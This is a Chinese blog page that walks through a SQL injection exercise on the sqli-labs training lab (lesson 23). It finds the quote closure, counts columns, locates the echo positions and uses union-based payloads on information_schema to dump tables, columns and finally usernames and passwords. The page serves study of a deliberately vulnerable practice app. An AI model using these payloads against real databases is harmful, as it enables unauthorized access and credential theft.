当前位置: 首页 > news >正文

SQL注入实例(sqli-labs/less-23)

news 2025/6/29 7:55:02

 0、初始网页

1、闭合方式判断

闭合符号为单引号,通过测试发现过滤了注释,所以直接闭合

2、确定查询表的列数

确定查询表的列数为3列

?id=1' order by 3 '

3、确定回显位置

回显位置为第二列和第三列

?id=-1' union select 1,2,3 '

4、查看当前登录和数据库

?id=-1' union select 1,user(),database()'

5、查询当前数据库下的表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' '

6、查询user表中的列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' '

7、查询最终的账号密码

?id=-1' union select 1,group_concat(username),3 from users where 1=1 and '1'='1

http://www.lryc.cn/news/419115.html

相关文章:

  • 3.Redis数据类型(二)
  • JavaWeb系列十一: Web 开发会话技术Session
  • k8s中yaml文件的编写
  • 打卡第37天------动态规划
  • openfeign本地试用
  • 数据库|SQLServer数据库:查询函数(SUM、COUNT、MAX、MIN、AVG)的使用
  • 简单Qt贪吃蛇项目
  • 画菱形(曼哈顿距离)
  • CSP初赛知识点讲解(六)
  • linux rocky 9.2系统安装mysql-wsrep-8.4.2-26.20-linux-x86_64.tar.gz二进制包
  • QT实现上传服务器功能
  • 元岳食堂采购供应链系统-智慧食堂数据化解决方案
  • 基于Java+SpringBoot+Vue的影城管理系统
  • 自定义starter
  • Docker 入门全攻略:安装、操作与常用命令指南
  • mstsc被卸载,远程桌面mstsc.exe重装
  • 从根儿上学习spring 十一 之run方法启动第四段(5)
  • 常见8种数据结构
  • 黑马Java零基础视频教程精华部分_11_面向对象进阶(3)_抽象类、接口、适配器
  • Promethues Metrics
  • 公网IP与私网IP具体有哪些区别?
  • LeetCode——3143. 正方形中的最多点数
  • const重新赋值的问题
  • python开发上位机 - PyCharm环境搭建、安装PyQt5及工具
  • day02-安装虚拟机
  • Qt:线程
  • VisionPro二次开发学习笔记11-使用 Caliper和Fixture定位Blob工具检测方块
  • 高翔【自动驾驶与机器人中的SLAM技术】学习笔记(五)卡尔曼滤波器一:认知卡尔曼滤波器;协方差矩阵与方差;
  • 【Go】通过反射解析对象tag信息,实现简易ORM
  • gemini2相机和宇树雷达L1的使用注意点